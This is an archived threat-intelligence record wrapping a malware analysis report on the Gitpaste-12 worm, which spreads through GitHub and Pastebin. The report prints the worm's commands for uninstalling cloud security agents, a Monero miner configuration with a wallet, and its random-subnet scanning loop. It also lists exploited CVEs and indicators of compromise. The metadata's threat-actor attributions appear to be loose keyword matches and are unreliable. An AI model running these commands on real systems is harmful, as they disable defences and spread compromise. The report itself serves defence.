{
	"id": "d3969813-d1b7-4860-bc2b-0305bb2f0b8d",
	"created_at": "2026-04-06T00:11:15.160867Z",
	"updated_at": "2026-04-10T03:32:46.095728Z",
	"deleted_at": null,
	"sha1_hash": "9a4ecc3ff1362fd7c03873a83df72c1b442fc255",
	"title": "Gitpaste-12: a new worming botnet with reverse shell capability spreading via GitHub and Pastebin",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 479288,
	"plain_text": "Gitpaste-12: a new worming botnet with reverse shell capability\r\nspreading via GitHub and Pastebin\r\nBy Alex Burt\r\nPublished: 2020-11-05 · Archived: 2026-04-05 16:59:06 UTC\r\nGitpaste-12: a new worming botnet with reverse shell capability spreading via GitHub and Pastebin\r\nGitpaste-12 is a new worm recently discovered by Juniper Threat Labs, which uses GitHub and Pastebin for housing\r\ncomponent code and has at least 12 different attack modules available.\r\nThere is evidence of test code for possible future modules, indicating ongoing development for this malware. For now,\r\nhowever, targets are Linux based x86 servers, as well as Linux ARM and MIPS based IoT devices.\r\nThis malware has been dubbed Gitpaste-12 because of the usage of GitHub, Pastebin and 12 ways to compromise the\r\nsystem. The first GitPaste-12 first attacks were detected by Juniper Threat Labs on October 15, 2020. We’ve reported both\r\nthe Pastebin URL and the git repo in question and the git repo was closed on October 30, 2020. This should stop the\r\nproliferation of this botnet.\r\nThe GitHub repository used at the time of discovery was as follows:\r\nhttps://github[.]com/cnmnmsl-001/-\r\nFirst commit Thu Jul 9 21:07:06 2020\r\nLast commit Oct 27, 2020\r\nhttps://blogs.juniper.net/en-us/threat-research/gitpaste-12\r\nPage 1 of 8\n\nAnatomy of Gitpaste-12\r\nThe first phase of the attack is the initial system compromise (note the details of compromises used by this worm will be\r\ndiscussed later in this piece). This worm has 12 known attack modules and more under development. The worm will attempt\r\nto use known exploits to compromise systems and may also attempt to brute force passwords.\r\nImmediately after compromising a system, the malware sets up a cron job it downloads from Pastebin, which in turn calls\r\nthe same script and executes it again each minute. This is presumably one mechanism by which updates to the cron jobs can\r\nbe pushed to the botnet.\r\nThe main shell script uploaded during the attack to the victim machine starts to download and execute other components of\r\nGitpaste-12. First, it downloads and sets up cron job, which periodically downloads and executes script from Pastebin:\r\nNext, it downloads from GitHub (https://raw.githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) and executes it.\r\nThe malware begins by preparing the environment. This means stripping the system of its defenses, including firewall rules,\r\nselinux, apparmor, as well as common attack prevention and monitoring software.\r\nThe shadu1 script contains comments in the Chinese language and has multiple commands available to attackers to disable\r\ndifferent security capabilities, as discussed above. The following example has some commands that disable cloud security\r\nagents, which clearly indicates the threat actor intends to target public cloud computing infrastructure provided by Alibaba\r\nCloud and Tencent.\r\nExamples of these commands include:\r\nhttps://blogs.juniper.net/en-us/threat-research/gitpaste-12\r\nPage 2 of 8\n\ncurl https://update.aegis.aliyun.com/download/uninstall.sh | bash\r\ncurl https://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash\r\n/usr/local/qcloud/stargate/admin/uninstall.sh\r\n/usr/local/qcloud/YunJing/uninst.sh\r\n/usr/local/qcloud/monitor/barad/admin/uninstall.sh\r\nhttps://blogs.juniper.net/en-us/threat-research/gitpaste-12\r\nPage 3 of 8\n\nAnother capability is demonstrated in the ability to run miner for monero cryptocurrency with the following config:\r\n{ “background”: true, “log-file”: null, “access-log-file”: null, “retries”: 50, “retry-pause”: 5, “donate-level”: 2, “coin”:\r\n“xmr”, “custom-diff”: 0, “syslog”: false, “verbose”: false, “colors”: true, “workers”: true, “pools”: [ { “url”:\r\nhttps://blogs.juniper.net/en-us/threat-research/gitpaste-12\r\nPage 4 of 8\n\n“donate.v2.xmrig.com:5555”, “user”:\r\n“41qALJpqLhUNCHZTMSMQyf4LQotae9MZnb4u53JzqvHEWyc2i8PEFUCZ4TGL9AGU34ihPU8QGbRzc4FB2nHMsVeMHaYkx\r\n“pass”: “x” } ], “bind”: [ “0.0.0.0:12388” ], “api”: { “port”: 0, “access-token”: null, “worker-id”: null }}\r\nThe Gitpaste-12 malware contains the library hide.so and is loaded as LD_PRELOAD. Hide.so updates the crontab file to\r\ndownload and execute https://pastebin[.]com/raw/Tg5FQHhf. It also prevents administrators from collecting information\r\nabout running processes by intercepting “readdir” system calls and skip directories for processes like tcpdump, sudo,\r\nopenssl, etc. in “/proc”. The “/proc” directory in Linux contains information about running processes. It is used, for\r\nexample, by the “ps” command to show information about running processes. But unfortunately for this threat actor, this\r\nimplementation does not do what they expect it to do.\r\nWorming Capability\r\nThe Gitpaste-12 malware also contains a script that launches attacks against other machines, in an attempt to replicate and\r\nspread. It chooses a random /8 CIDR for attack and will try all addresses within that range, as demonstrated by this call:\r\nwhile true;do awk -va=\\$((\\$RANDOM%128)) ‘BEGIN{for(b=0;256\u003eb;b++) for(c=0;256\u003ec;c++) for(d=0;256\u003ed;d++)\r\nsystem(\\”./sh \\”a\\”.\\”d\\”.\\”c\\”.\\”b\\”\r\nAnd here we can see the worm attempting to spread:\r\nAnother version of the script also opens ports 30004 and 30005 for reverse shell commands:\r\nGitpaste-12 Exploits\r\nGitpaste-12 uses 11 vulnerabilities and a telnet brute forcer to spread. Known vulnerabilities include:\r\nCVE-2017-14135 Webadmin plugin for opendreambox\r\nCVE-2020-24217 HiSilicon based IPTV/H.264/H.265 video encoders\r\nCVE-2017-5638 Apache Struts\r\nCVE-2020-10987 Tenda router\r\nCVE-2014-8361 Miniigd SOAP service in Realtek SDK\r\nCVE-2020-15893 UPnP in dlink routers\r\nCVE-2013-5948 Asus routers\r\nEDB-ID: 48225 Netlink GPON Router\r\nEDB-ID: 40500 AVTECH IP Camera\r\nhttps://blogs.juniper.net/en-us/threat-research/gitpaste-12\r\nPage 5 of 8\n\nCVE-2019-10758 Mongo db\r\nCVE-2017-17215 (Huawei router)\r\nhttps://blogs.juniper.net/en-us/threat-research/gitpaste-12\r\nPage 6 of 8\n\nConclusion\r\nhttps://blogs.juniper.net/en-us/threat-research/gitpaste-12\r\nPage 7 of 8\n\nNo malware is good to have, but worms are particularly annoying. Their ability to spread in an automated fashion can lead\r\nto lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in\r\npoor reputation for your organization.\r\nJuniper Connected Security customers using SRX IDP and Juniper ATP Cloud are protected against Gitpaste-12.\r\nIOCs\r\nSome compromised systems have TCP ports 30004 and 30005 open for shell commands.\r\nMiner: e67f78c479857ed8c562e576dcc9a8471c5f1ab4c00bb557b1b9c2d9284b8af9\r\nhide.so: ed4868ba445469abfa3cfc6c70e8fdd36a4345c21a3f451c7b65d6041fb8492b\r\nMiner config: bd5e9fd8215f80ca49c142383ba7dbf7e24aaf895ae25af96bdab89c0bdcc3f1\r\nShell script: 5d1705f02cde12c27b85a0104cd76a39994733a75fa6e1e5b014565ad63e7bc3\r\nSource: https://blogs.juniper.net/en-us/threat-research/gitpaste-12\r\nhttps://blogs.juniper.net/en-us/threat-research/gitpaste-12\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.juniper.net/en-us/threat-research/gitpaste-12"
	],
	"report_names": [
		"gitpaste-12"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434275,
	"ts_updated_at": 1775791966,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9a4ecc3ff1362fd7c03873a83df72c1b442fc255.pdf",
		"text": "https://archive.orkl.eu/9a4ecc3ff1362fd7c03873a83df72c1b442fc255.txt",
		"img": "https://archive.orkl.eu/9a4ecc3ff1362fd7c03873a83df72c1b442fc255.jpg"
	}
}